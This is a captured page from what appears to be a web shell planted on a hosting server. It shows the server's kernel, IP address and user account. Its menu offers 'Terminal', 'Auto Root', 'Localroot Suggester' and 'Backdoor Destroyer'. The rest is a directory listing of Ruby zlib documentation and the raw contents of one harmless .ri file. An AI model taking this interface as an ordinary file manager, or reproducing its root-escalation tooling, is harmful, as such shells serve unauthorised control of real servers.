Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.188
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Zlib /
Delete
Unzip
Name
Size
Permission
Date
Action
BufError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
DataError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Deflate
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Error
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipFile
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipReader
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
GzipWriter
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InProgressError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Inflate
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
MemError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
NeedDict
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
StreamEnd
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
StreamError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
VersionError
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
ZStream
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
adler32-c.ri
915
B
-rw-r--r--
2026-04-07 17:42
adler32_combine-c.ri
541
B
-rw-r--r--
2026-04-07 17:42
cdesc-Zlib.ri
10.16
KB
-rw-r--r--
2026-04-07 17:42
crc32-c.ri
708
B
-rw-r--r--
2026-04-07 17:42
crc32_combine-c.ri
519
B
-rw-r--r--
2026-04-07 17:42
crc_table-c.ri
330
B
-rw-r--r--
2026-04-07 17:42
deflate-c.ri
876
B
-rw-r--r--
2026-04-07 17:42
gunzip-c.ri
701
B
-rw-r--r--
2026-04-07 17:42
gzip-c.ri
919
B
-rw-r--r--
2026-04-07 17:42
inflate-c.ri
790
B
-rw-r--r--
2026-04-07 17:42
zlib_version-c.ri
341
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" gzip:ETI"Zlib::gzip;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"8Gzip the given +string+. Valid values of level are ;TI"EZlib::NO_COMPRESSION, Zlib::BEST_SPEED, Zlib::BEST_COMPRESSION, ;TI"DZlib::DEFAULT_COMPRESSION (default), or an integer from 0 to 9.;To:RDoc::Markup::BlankLine o; ; [I"<This method is almost equivalent to the following code:;T@o:RDoc::Markup::Verbatim; [ I"1def gzip(string, level: nil, strategy: nil) ;TI" sio = StringIO.new ;TI" sio.binmode ;TI"7 gz = Zlib::GzipWriter.new(sio, level, strategy) ;TI" gz.write(string) ;TI" gz.close ;TI" sio.string ;TI" end ;T:@format0o; ; [I"See also Zlib.gunzip;T: @fileI"ext/zlib/zlib.c;T:0@omit_headings_from_table_of_contents_below0I"9Zlib.gzip(src, level: nil, strategy: nil) -> String ;T0[ I" (p1);T@!FI" Zlib;TcRDoc::NormalModule00